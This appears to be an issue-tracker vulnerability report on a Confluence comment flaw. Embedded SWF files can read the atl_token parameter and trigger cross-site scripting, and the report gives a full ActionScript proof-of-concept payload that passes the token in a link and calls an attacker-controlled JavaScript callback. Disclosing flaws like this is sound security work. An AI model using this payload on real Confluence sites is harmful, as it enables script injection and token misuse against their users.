Details

    • CVSS Score:
      4.9

      Description

      In confluence comment module user can embed swf file in their comment, confluence are using a `atl_token` parameter on GET HTTP request, if the attacker send the link of .swf file( the value of src on embed tag) to his victim the malicious .SWF won't execute on the victim's browser .

      We can bypass this protection by using this.loaderInfo.parameters in malicious .swf, this.loaderInfo.parameters.parameter_name extract the value of your target parameter, in this case it is atl_token , i also inserted a <a> tag in malicous swf file so if the victim clicks the link in our embed swf file the .swf file will be run in the victim's browser.

      PAYLOAD

      package
      {
      import flash.display.Sprite;
      import flash.text.TextFormat;
      import flash.text.TextField;
      import flash.external.ExternalInterface;
      
      public class Main extends Sprite
      {
      
      public function Main()
      {
      super();
      var myFormat:TextFormat = new TextFormat();
      myFormat.size = 200;
      var xcode:String = this.loaderInfo.parameters.atl_token;
      var myText:TextField = new TextField();
      myText.width = 1000;
      myText.height = 1000;
      myText.htmlText = "<font size=\'300px\'> <a target=\'_blank\' href=\'https://pwnie.ninja/confluence/download/attachments/9469955/NewProjectx.swf?atl_token=" + xcode + "&callback=alert\'>CliCK ME</a> </font>";
      addChild(myText);
      ExternalInterface.call(this.loaderInfo.parameters.callback,"xss");
      }
      }
      }
      
      

        Attachments

          Activity

            People

            • Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved:
                Last commented:
                2 years, 1 week, 2 days ago